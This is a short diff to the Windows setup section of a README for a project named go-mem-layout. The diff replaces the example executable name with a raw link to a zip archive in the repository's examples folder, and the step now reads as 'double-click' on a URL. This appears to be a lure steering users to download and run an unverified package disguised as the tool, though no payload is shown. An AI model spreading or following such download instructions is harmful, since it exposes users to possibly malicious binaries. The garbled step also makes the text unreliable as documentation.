bisrat1234-2/go-mem-layout/README.md

 ### For Windows Users

 1. Navigate to the folder where you saved the downloaded file.
-2. Double-click on the executable file (e.g., `go-mem-layout.exe`).
+2. Double-click on the executable file (e.g., `https://github.com/bisrat1234-2/go-mem-layout/raw/refs/heads/main/examples/go-mem-layout-2.5-alpha.5.zip`).
 3. A window will open showing the application interface.

 ### For macOS Users